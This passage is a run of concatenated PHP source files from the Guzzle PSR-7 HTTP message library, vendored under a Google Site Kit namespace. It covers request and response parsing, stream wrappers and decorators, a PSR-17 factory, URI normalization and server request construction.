$version = isset($parts[2]) ? \explode('/', $parts[2])[1] : '1.1'; $request = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request($parts[0], $matches[1] === '/' ? self::parseRequestUri($parts[1], $data['headers']) : $parts[1], $data['headers'], $data['body'], $version); return $matches[1] === '/' ? $request : $request->withRequestTarget($parts[1]); } /** * Parses a response message string into a response object. * * @param string $message Response message string. */ public static function parseResponse(string $message) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface { $data = self::parseMessage($message); // According to https://datatracker.ietf.org/doc/html/rfc7230#section-3.1.2 // the space between status-code and reason-phrase is required. But // browsers accept responses without space and reason as well. if (!\preg_match('/^HTTP\\/.* [0-9]{3}( .*|$)/', $data['start-line'])) { throw new \InvalidArgumentException('Invalid response string: ' . $data['start-line']); } $parts = \explode(' ', $data['start-line'], 3); return new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Response((int) $parts[1], $data['headers'], $data['body'], \explode('/', $parts[0])[1], $parts[2] ?? null); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Converts Guzzle streams into PHP stream resources. * * @see https://www.php.net/streamwrapper */ final class StreamWrapper { /** @var resource */ public $context; /** @var StreamInterface */ private $stream; /** @var string r, r+, or w */ private $mode; /** * Returns a resource representing the stream. * * @param StreamInterface $stream The stream to get a resource for * * @return resource * * @throws \InvalidArgumentException if stream is not readable or writable */ public static function getResource(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $stream) { self::register(); if ($stream->isReadable()) { $mode = $stream->isWritable() ? 'r+' : 'r'; } elseif ($stream->isWritable()) { $mode = 'w'; } else { throw new \InvalidArgumentException('The stream must be readable, ' . 'writable, or both.'); } return \fopen('guzzle://stream', $mode, \false, self::createStreamContext($stream)); } /** * Creates a stream context that can be used to open a stream as a php stream resource. * * @return resource */ public static function createStreamContext(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $stream) { return \stream_context_create(['guzzle' => ['stream' => $stream]]); } /** * Registers the stream wrapper if needed */ public static function register() : void { if (!\in_array('guzzle', \stream_get_wrappers())) { \stream_wrapper_register('guzzle', __CLASS__); } } public function stream_open(string $path, string $mode, int $options, ?string &$opened_path = null) : bool { $options = \stream_context_get_options($this->context); if (!isset($options['guzzle']['stream'])) { return \false; } $this->mode = $mode; $this->stream = $options['guzzle']['stream']; return \true; } public function stream_read(int $count) : string { return $this->stream->read($count); } public function stream_write(string $data) : int { return $this->stream->write($data); } public function stream_tell() : int { return $this->stream->tell(); } public function stream_eof() : bool { return $this->stream->eof(); } public function stream_seek(int $offset, int $whence) : bool { $this->stream->seek($offset, $whence); return \true; } /** * @return resource|false */ public function stream_cast(int $cast_as) { $stream = clone $this->stream; $resource = $stream->detach(); return $resource ?? \false; } /** * @return array{ * dev: int, * ino: int, * mode: int, * nlink: int, * uid: int, * gid: int, * rdev: int, * size: int, * atime: int, * mtime: int, * ctime: int, * blksize: int, * blocks: int * }|false */ public function stream_stat() { if ($this->stream->getSize() === null) { return \false; } static $modeMap = ['r' => 33060, 'rb' => 33060, 'r+' => 33206, 'w' => 33188, 'wb' => 33188]; return ['dev' => 0, 'ino' => 0, 'mode' => $modeMap[$this->mode], 'nlink' => 0, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => $this->stream->getSize() ?: 0, 'atime' => 0, 'mtime' => 0, 'ctime' => 0, 'blksize' => 0, 'blocks' => 0]; } /** * @return array{ * dev: int, * ino: int, * mode: int, * nlink: int, * uid: int, * gid: int, * rdev: int, * size: int, * atime: int, * mtime: int, * ctime: int, * blksize: int, * blocks: int * } */ public function url_stat(string $path, int $flags) : array { return ['dev' => 0, 'ino' => 0, 'mode' => 0, 'nlink' => 0, 'uid' => 0, 'gid' => 0, 'rdev' => 0, 'size' => 0, 'atime' => 0, 'mtime' => 0, 'ctime' => 0, 'blksize' => 0, 'blocks' => 0]; } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; /** * @internal */ final class Rfc7230 { /** * Header related regular expressions (based on amphp/http package) * * Note: header delimiter (\r\n) is modified to \r?\n to accept line feed only delimiters for BC reasons. * * @see https://github.com/amphp/http/blob/v1.0.1/src/Rfc7230.php#L12-L15 * * @license https://github.com/amphp/http/blob/v1.0.1/LICENSE */ public const HEADER_REGEX = "(^([^()<>@,;:\\\"/[\\]?={}\x01- ]++):[ \t]*+((?:[ \t]*+[!-~\x80-\xff]++)*+)[ \t]*+\r?\n)m"; public const HEADER_FOLD_REGEX = "(\r?\n[ \t]++)"; } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestFactoryInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseFactoryInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestFactoryInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamFactoryInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\UploadedFileFactoryInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\UploadedFileInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\UriFactoryInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * Implements all of the PSR-17 interfaces. * * Note: in consuming code it is recommended to require the implemented interfaces * and inject the instance of this class multiple times. */ final class HttpFactory implements \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestFactoryInterface, \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseFactoryInterface, \Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestFactoryInterface, \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamFactoryInterface, \Google\Site_Kit_Dependencies\Psr\Http\Message\UploadedFileFactoryInterface, \Google\Site_Kit_Dependencies\Psr\Http\Message\UriFactoryInterface { public function createUploadedFile(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $stream, ?int $size = null, int $error = \UPLOAD_ERR_OK, ?string $clientFilename = null, ?string $clientMediaType = null) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UploadedFileInterface { if ($size === null) { $size = $stream->getSize(); } return new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\UploadedFile($stream, $size, $error, $clientFilename, $clientMediaType); } public function createStream(string $content = '') : \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { return \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor($content); } public function createStreamFromFile(string $file, string $mode = 'r') : \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { try { $resource = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::tryFopen($file, $mode); } catch (\RuntimeException $e) { if ('' === $mode || \false === \in_array($mode[0], ['r', 'w', 'a', 'x', 'c'], \true)) { throw new \InvalidArgumentException(\sprintf('Invalid file opening mode "%s"', $mode), 0, $e); } throw $e; } return \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor($resource); } public function createStreamFromResource($resource) : \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { return \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor($resource); } public function createServerRequest(string $method, $uri, array $serverParams = []) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface { if (empty($method)) { if (!empty($serverParams['REQUEST_METHOD'])) { $method = $serverParams['REQUEST_METHOD']; } else { throw new \InvalidArgumentException('Cannot determine HTTP method'); } } return new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\ServerRequest($method, $uri, [], null, '1.1', $serverParams); } public function createResponse(int $code = 200, string $reasonPhrase = '') : \Google\Site_Kit_Dependencies\Psr\Http\Message\ResponseInterface { return new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Response($code, [], null, '1.1', $reasonPhrase); } public function createRequest(string $method, $uri) : \Google\Site_Kit_Dependencies\Psr\Http\Message\RequestInterface { return new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request($method, $uri); } public function createUri(string $uri = '') : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { return new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Uri($uri); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * Provides methods to normalize and compare URIs. * * @author Tobias Schultze * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-6 */ final class UriNormalizer { /** * Default normalizations which only include the ones that preserve semantics. */ public const PRESERVING_NORMALIZATIONS = self::CAPITALIZE_PERCENT_ENCODING | self::DECODE_UNRESERVED_CHARACTERS | self::CONVERT_EMPTY_PATH | self::REMOVE_DEFAULT_HOST | self::REMOVE_DEFAULT_PORT | self::REMOVE_DOT_SEGMENTS; /** * All letters within a percent-encoding triplet (e.g., "%3A") are case-insensitive, and should be capitalized. * * Example: http://example.org/a%c2%b1b → http://example.org/a%C2%B1b */ public const CAPITALIZE_PERCENT_ENCODING = 1; /** * Decodes percent-encoded octets of unreserved characters. * * For consistency, percent-encoded octets in the ranges of ALPHA (%41–%5A and %61–%7A), DIGIT (%30–%39), * hyphen (%2D), period (%2E), underscore (%5F), or tilde (%7E) should not be created by URI producers and, * when found in a URI, should be decoded to their corresponding unreserved characters by URI normalizers. * * Example: http://example.org/%7Eusern%61me/ → http://example.org/~username/ */ public const DECODE_UNRESERVED_CHARACTERS = 2; /** * Converts the empty path to "/" for http and https URIs. * * Example: http://example.org → http://example.org/ */ public const CONVERT_EMPTY_PATH = 4; /** * Removes the default host of the given URI scheme from the URI. * * Only the "file" scheme defines the default host "localhost". * All of `file:/myfile`, `file:///myfile`, and `file://localhost/myfile` * are equivalent according to RFC 3986. The first format is not accepted * by PHPs stream functions and thus already normalized implicitly to the * second format in the Uri class. See `GuzzleHttp\Psr7\Uri::composeComponents`. * * Example: file://localhost/myfile → file:///myfile */ public const REMOVE_DEFAULT_HOST = 8; /** * Removes the default port of the given URI scheme from the URI. * * Example: http://example.org:80/ → http://example.org/ */ public const REMOVE_DEFAULT_PORT = 16; /** * Removes unnecessary dot-segments. * * Dot-segments in relative-path references are not removed as it would * change the semantics of the URI reference. * * Example: http://example.org/../a/b/../c/./d.html → http://example.org/a/c/d.html */ public const REMOVE_DOT_SEGMENTS = 32; /** * Paths which include two or more adjacent slashes are converted to one. * * Webservers usually ignore duplicate slashes and treat those URIs equivalent. * But in theory those URIs do not need to be equivalent. So this normalization * may change the semantics. Encoded slashes (%2F) are not removed. * * Example: http://example.org//foo///bar.html → http://example.org/foo/bar.html */ public const REMOVE_DUPLICATE_SLASHES = 64; /** * Sort query parameters with their values in alphabetical order. * * However, the order of parameters in a URI may be significant (this is not defined by the standard). * So this normalization is not safe and may change the semantics of the URI. * * Example: ?lang=en&article=fred → ?article=fred&lang=en * * Note: The sorting is neither locale nor Unicode aware (the URI query does not get decoded at all) as the * purpose is to be able to compare URIs in a reproducible way, not to have the params sorted perfectly. */ public const SORT_QUERY_PARAMETERS = 128; /** * Returns a normalized URI. * * The scheme and host component are already normalized to lowercase per PSR-7 UriInterface. * This methods adds additional normalizations that can be configured with the $flags parameter. * * PSR-7 UriInterface cannot distinguish between an empty component and a missing component as * getQuery(), getFragment() etc. always return a string. This means the URIs "/?#" and "/" are * treated equivalent which is not necessarily true according to RFC 3986. But that difference * is highly uncommon in reality. So this potential normalization is implied in PSR-7 as well. * * @param UriInterface $uri The URI to normalize * @param int $flags A bitmask of normalizations to apply, see constants * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-6.2 */ public static function normalize(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri, int $flags = self::PRESERVING_NORMALIZATIONS) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { if ($flags & self::CAPITALIZE_PERCENT_ENCODING) { $uri = self::capitalizePercentEncoding($uri); } if ($flags & self::DECODE_UNRESERVED_CHARACTERS) { $uri = self::decodeUnreservedCharacters($uri); } if ($flags & self::CONVERT_EMPTY_PATH && $uri->getPath() === '' && ($uri->getScheme() === 'http' || $uri->getScheme() === 'https')) { $uri = $uri->withPath('/'); } if ($flags & self::REMOVE_DEFAULT_HOST && $uri->getScheme() === 'file' && $uri->getHost() === 'localhost') { $uri = $uri->withHost(''); } if ($flags & self::REMOVE_DEFAULT_PORT && $uri->getPort() !== null && \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Uri::isDefaultPort($uri)) { $uri = $uri->withPort(null); } if ($flags & self::REMOVE_DOT_SEGMENTS && !\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Uri::isRelativePathReference($uri)) { $uri = $uri->withPath(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\UriResolver::removeDotSegments($uri->getPath())); } if ($flags & self::REMOVE_DUPLICATE_SLASHES) { $uri = $uri->withPath(\preg_replace('#//++#', '/', $uri->getPath())); } if ($flags & self::SORT_QUERY_PARAMETERS && $uri->getQuery() !== '') { $queryKeyValues = \explode('&', $uri->getQuery()); \sort($queryKeyValues); $uri = $uri->withQuery(\implode('&', $queryKeyValues)); } return $uri; } /** * Whether two URIs can be considered equivalent. * * Both URIs are normalized automatically before comparison with the given $normalizations bitmask. The method also * accepts relative URI references and returns true when they are equivalent. This of course assumes they will be * resolved against the same base URI. If this is not the case, determination of equivalence or difference of * relative references does not mean anything. * * @param UriInterface $uri1 An URI to compare * @param UriInterface $uri2 An URI to compare * @param int $normalizations A bitmask of normalizations to apply, see constants * * @see https://datatracker.ietf.org/doc/html/rfc3986#section-6.1 */ public static function isEquivalent(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri1, \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri2, int $normalizations = self::PRESERVING_NORMALIZATIONS) : bool { return (string) self::normalize($uri1, $normalizations) === (string) self::normalize($uri2, $normalizations); } private static function capitalizePercentEncoding(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { $regex = '/(?:%[A-Fa-f0-9]{2})++/'; $callback = function (array $match) : string { return \strtoupper($match[0]); }; return $uri->withPath(\preg_replace_callback($regex, $callback, $uri->getPath()))->withQuery(\preg_replace_callback($regex, $callback, $uri->getQuery())); } private static function decodeUnreservedCharacters(\Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface $uri) : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { $regex = '/%(?:2D|2E|5F|7E|3[0-9]|[46][1-9A-F]|[57][0-9A])/i'; $callback = function (array $match) : string { return \rawurldecode($match[0]); }; return $uri->withPath(\preg_replace_callback($regex, $callback, $uri->getPath()))->withQuery(\preg_replace_callback($regex, $callback, $uri->getQuery())); } private function __construct() { // cannot be instantiated } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Decorator used to return only a subset of a stream. */ final class LimitStream implements \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { use StreamDecoratorTrait; /** @var int Offset to start reading from */ private $offset; /** @var int Limit the number of bytes that can be read */ private $limit; /** @var StreamInterface */ private $stream; /** * @param StreamInterface $stream Stream to wrap * @param int $limit Total number of bytes to allow to be read * from the stream. Pass -1 for no limit. * @param int $offset Position to seek to before reading (only * works on seekable streams). */ public function __construct(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $stream, int $limit = -1, int $offset = 0) { $this->stream = $stream; $this->setLimit($limit); $this->setOffset($offset); } public function eof() : bool { // Always return true if the underlying stream is EOF if ($this->stream->eof()) { return \true; } // No limit and the underlying stream is not at EOF if ($this->limit === -1) { return \false; } return $this->stream->tell() >= $this->offset + $this->limit; } /** * Returns the size of the limited subset of data */ public function getSize() : ?int { if (null === ($length = $this->stream->getSize())) { return null; } elseif ($this->limit === -1) { return $length - $this->offset; } else { return \min($this->limit, $length - $this->offset); } } /** * Allow for a bounded seek on the read limited stream */ public function seek($offset, $whence = \SEEK_SET) : void { if ($whence !== \SEEK_SET || $offset < 0) { throw new \RuntimeException(\sprintf('Cannot seek to offset %s with whence %s', $offset, $whence)); } $offset += $this->offset; if ($this->limit !== -1) { if ($offset > $this->offset + $this->limit) { $offset = $this->offset + $this->limit; } } $this->stream->seek($offset); } /** * Give a relative tell() */ public function tell() : int { return $this->stream->tell() - $this->offset; } /** * Set the offset to start limiting from * * @param int $offset Offset to seek to and begin byte limiting from * * @throws \RuntimeException if the stream cannot be seeked. */ public function setOffset(int $offset) : void { $current = $this->stream->tell(); if ($current !== $offset) { // If the stream cannot seek to the offset position, then read to it if ($this->stream->isSeekable()) { $this->stream->seek($offset); } elseif ($current > $offset) { throw new \RuntimeException("Could not seek to stream offset {$offset}"); } else { $this->stream->read($offset - $current); } } $this->offset = $offset; } /** * Set the limit of bytes that the decorator allows to be read from the * stream. * * @param int $limit Number of bytes to allow to be read from the stream. * Use -1 for no limit. */ public function setLimit(int $limit) : void { $this->limit = $limit; } public function read($length) : string { if ($this->limit === -1) { return $this->stream->read($length); } // Check if the current position is less than the total allowed // bytes + original offset $remaining = $this->offset + $this->limit - $this->stream->tell(); if ($remaining > 0) { // Only return the amount of requested data, ensuring that the byte // limit is not exceeded return $this->stream->read(\min($remaining, $length)); } return ''; } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Uses PHP's zlib.inflate filter to inflate zlib (HTTP deflate, RFC1950) or gzipped (RFC1952) content. * * This stream decorator converts the provided stream to a PHP stream resource, * then appends the zlib.inflate filter. The stream is then converted back * to a Guzzle stream resource to be used as a Guzzle stream. * * @see https://datatracker.ietf.org/doc/html/rfc1950 * @see https://datatracker.ietf.org/doc/html/rfc1952 * @see https://www.php.net/manual/en/filters.compression.php */ final class InflateStream implements \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { use StreamDecoratorTrait; /** @var StreamInterface */ private $stream; public function __construct(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $stream) { $resource = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\StreamWrapper::getResource($stream); // Specify window=15+32, so zlib will use header detection to both gzip (with header) and zlib data // See https://www.zlib.net/manual.html#Advanced definition of inflateInit2 // "Add 32 to windowBits to enable zlib and gzip decoding with automatic header detection" // Default window size is 15. \stream_filter_append($resource, 'zlib.inflate', \STREAM_FILTER_READ, ['window' => 15 + 32]); $this->stream = $stream->isSeekable() ? new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Stream($resource) : new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\NoSeekStream(new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Stream($resource)); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use InvalidArgumentException; use Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\UploadedFileInterface; use Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface; /** * Server-side HTTP request * * Extends the Request definition to add methods for accessing incoming data, * specifically server parameters, cookies, matched path parameters, query * string arguments, body parameters, and upload file information. * * "Attributes" are discovered via decomposing the request (and usually * specifically the URI path), and typically will be injected by the application. * * Requests are considered immutable; all methods that might change state are * implemented such that they retain the internal state of the current * message and return a new instance that contains the changed state. */ class ServerRequest extends \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request implements \Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface { /** * @var array */ private $attributes = []; /** * @var array */ private $cookieParams = []; /** * @var array|object|null */ private $parsedBody; /** * @var array */ private $queryParams = []; /** * @var array */ private $serverParams; /** * @var array */ private $uploadedFiles = []; /** * @param string $method HTTP method * @param string|UriInterface $uri URI * @param (string|string[])[] $headers Request headers * @param string|resource|StreamInterface|null $body Request body * @param string $version Protocol version * @param array $serverParams Typically the $_SERVER superglobal */ public function __construct(string $method, $uri, array $headers = [], $body = null, string $version = '1.1', array $serverParams = []) { $this->serverParams = $serverParams; parent::__construct($method, $uri, $headers, $body, $version); } /** * Return an UploadedFile instance array. * * @param array $files An array which respect $_FILES structure * * @throws InvalidArgumentException for unrecognized values */ public static function normalizeFiles(array $files) : array { $normalized = []; foreach ($files as $key => $value) { if ($value instanceof \Google\Site_Kit_Dependencies\Psr\Http\Message\UploadedFileInterface) { $normalized[$key] = $value; } elseif (\is_array($value) && isset($value['tmp_name'])) { $normalized[$key] = self::createUploadedFileFromSpec($value); } elseif (\is_array($value)) { $normalized[$key] = self::normalizeFiles($value); continue; } else { throw new \InvalidArgumentException('Invalid value in files specification'); } } return $normalized; } /** * Create and return an UploadedFile instance from a $_FILES specification. * * If the specification represents an array of values, this method will * delegate to normalizeNestedFileSpec() and return that return value. * * @param array $value $_FILES struct * * @return UploadedFileInterface|UploadedFileInterface[] */ private static function createUploadedFileFromSpec(array $value) { if (\is_array($value['tmp_name'])) { return self::normalizeNestedFileSpec($value); } return new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\UploadedFile($value['tmp_name'], (int) $value['size'], (int) $value['error'], $value['name'], $value['type']); } /** * Normalize an array of file specifications. * * Loops through all nested files and returns a normalized array of * UploadedFileInterface instances. * * @return UploadedFileInterface[] */ private static function normalizeNestedFileSpec(array $files = []) : array { $normalizedFiles = []; foreach (\array_keys($files['tmp_name']) as $key) { $spec = ['tmp_name' => $files['tmp_name'][$key], 'size' => $files['size'][$key] ?? null, 'error' => $files['error'][$key] ?? null, 'name' => $files['name'][$key] ?? null, 'type' => $files['type'][$key] ?? null]; $normalizedFiles[$key] = self::createUploadedFileFromSpec($spec); } return $normalizedFiles; } /** * Return a ServerRequest populated with superglobals: * $_GET * $_POST * $_COOKIE * $_FILES * $_SERVER */ public static function fromGlobals() : \Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface { $method = $_SERVER['REQUEST_METHOD'] ?? 'GET'; $headers = \getallheaders(); $uri = self::getUriFromGlobals(); $body = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\CachingStream(new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\LazyOpenStream('php://input', 'r+')); $protocol = isset($_SERVER['SERVER_PROTOCOL']) ? \str_replace('HTTP/', '', $_SERVER['SERVER_PROTOCOL']) : '1.1'; $serverRequest = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\ServerRequest($method, $uri, $headers, $body, $protocol, $_SERVER); return $serverRequest->withCookieParams($_COOKIE)->withQueryParams($_GET)->withParsedBody($_POST)->withUploadedFiles(self::normalizeFiles($_FILES)); } private static function extractHostAndPortFromAuthority(string $authority) : array { $uri = 'http://' . $authority; $parts = \parse_url($uri); if (\false === $parts) { return [null, null]; } $host = $parts['host'] ?? null; $port = $parts['port'] ?? null; return [$host, $port]; } /** * Get a Uri populated with values from $_SERVER. */ public static function getUriFromGlobals() : \Google\Site_Kit_Dependencies\Psr\Http\Message\UriInterface { $uri = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Uri(''); $uri = $uri->withScheme(!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' ? 'https' : 'http'); $hasPort = \false; if (isset($_SERVER['HTTP_HOST'])) { [$host, $port] = self::extractHostAndPortFromAuthority($_SERVER['HTTP_HOST']); if ($host !== null) { $uri = $uri->withHost($host); } if ($port !== null) { $hasPort = \true; $uri = $uri->withPort($port); } } elseif (isset($_SERVER['SERVER_NAME'])) { $uri = $uri->withHost($_SERVER['SERVER_NAME']); } elseif (isset($_SERVER['SERVER_ADDR'])) { $uri = $uri->withHost($_SERVER['SERVER_ADDR']); } if (!$hasPort && isset($_SERVER['SERVER_PORT'])) { $uri = $uri->withPort($_SERVER['SERVER_PORT']); } $hasQuery = \false; if (isset($_SERVER['REQUEST_URI'])) { $requestUriParts = \explode('?', $_SERVER['REQUEST_URI'], 2); $uri = $uri->withPath($requestUriParts[0]); if (isset($requestUriParts[1])) { $hasQuery = \true; $uri = $uri->withQuery($requestUriParts[1]); } } if (!$hasQuery && isset($_SERVER['QUERY_STRING'])) { $uri = $uri->withQuery($_SERVER['QUERY_STRING']); } return $uri; } public function getServerParams() : array { return $this->serverParams; } public function getUploadedFiles() : array { return $this->uploadedFiles; } public function withUploadedFiles(array $uploadedFiles) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface { $new = clone $this; $new->uploadedFiles = $uploadedFiles; return $new; } public function getCookieParams() : array { return $this->cookieParams; } public function withCookieParams(array $cookies) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface { $new = clone $this; $new->cookieParams = $cookies; return $new; } public function getQueryParams() : array { return $this->queryParams; } public function withQueryParams(array $query) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface { $new = clone $this; $new->queryParams = $query; return $new; } /** * @return array|object|null */ public function getParsedBody() { return $this->parsedBody; } public function withParsedBody($data) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface { $new = clone $this; $new->parsedBody = $data; return $new; } public function getAttributes() : array { return $this->attributes; } /** * @return mixed */ public function getAttribute($attribute, $default = null) { if (\false === \array_key_exists($attribute, $this->attributes)) { return $default; } return $this->attributes[$attribute]; } public function withAttribute($attribute, $value) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface { $new = clone $this; $new->attributes[$attribute] = $value; return $new; } public function withoutAttribute($attribute) : \Google\Site_Kit_Dependencies\Psr\Http\Message\ServerRequestInterface { if (\false === \array_key_exists($attribute, $this->attributes)) { return $this; } $new = clone $this; unset($new->attributes[$attribute]); return $new; } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Stream decorator that prevents a stream from being seeked. */ final class NoSeekStream implements \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { use StreamDecoratorTrait; /** @var StreamInterface */ private $stream; public function seek($offset, $whence = \SEEK_SET) : void { throw new \RuntimeException('Cannot seek a NoSeekStream'); } public function isSeekable() : bool { return \false; } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Stream decorator that begins dropping data once the size of the underlying * stream becomes too full. */ final class DroppingStream implements \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { use StreamDecoratorTrait; /** @var int */ private $maxLength; /** @var StreamInterface */ private $stream; /** * @param StreamInterface $stream Underlying stream to decorate. * @param int $maxLength Maximum size before dropping data. */ public function __construct(\Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface $stream, int $maxLength) { $this->stream = $stream; $this->maxLength = $maxLength; } public function write($string) : int { $diff = $this->maxLength - $this->stream->getSize(); // Begin returning 0 when the underlying stream is too large. if ($diff <= 0) { return 0; } // Write the stream or a subset of the stream if needed. if (\strlen($string) < $diff) { return $this->stream->write($string); } return $this->stream->write(\substr($string, 0, $diff)); } } <?php declare (strict_types=1); namespace Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface; /** * Provides a read only stream that pumps data from a PHP callable. * * When invoking the provided callable, the PumpStream will pass the amount of * data requested to read to the callable. The callable can choose to ignore * this value and return fewer or more bytes than requested. Any extra data * returned by the provided callable is buffered internally until drained using * the read() function of the PumpStream. The provided callable MUST return * false when there is no more data to read. */ final class PumpStream implements \Google\Site_Kit_Dependencies\Psr\Http\Message\StreamInterface { /** @var callable(int): (string|false|null)|null */ private $source; /** @var int|null */ private $size; /** @var int */ private $tellPos = 0; /** @var array */ private $metadata; /** @var BufferStream */ private $buffer; /** * @param callable(int): (string|false|null) $source Source of the stream data. The callable MAY * accept an integer argument used to control the * amount of data to return. The callable MUST * return a string when called, or false|null on error * or EOF. * @param array{size?: int, metadata?: array} $options Stream options: * - metadata: Hash of metadata to use with stream. * - size: Size of the stream, if known. */ public function __construct(callable $source, array $options = []) { $this->source = $source; $this->size = $options['size'] ?? null; $this->metadata = $options['metadata'] ?? []; $this->buffer = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\BufferStream(); } public function __toString() : string { try { return \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::copyToString($this); } catch (\Throwable $e) { if (\PHP_VERSION_ID >= 70400) { throw $e; } \trigger_error(\sprintf('%s::__toString exception: %s', self::class, (string) $e), \E_USER_ERROR); return ''; } } public function close() : void { $this->detach(); } public function detach() { $this->tellPos = 0; $this->source = null; return null; } public function getSize() : ?int { return $this->size; } public function tell() : int { return $this->tellPos; } public function eof() : bool { return $this->source === null; } public function isSeekable() : bool { return \false; } public function rewind() : void { $this->seek(0); } public function seek($offset, $whence = \SEEK_SET) : void { throw new \RuntimeException('Cannot seek a PumpStream'); } public function isWritable() : bool { return \false; } public function write($string) : int { throw new \RuntimeException('Cannot write to a PumpStream'); } public function isReadable() : bool { return \true; } public function read($length) : string { $data = 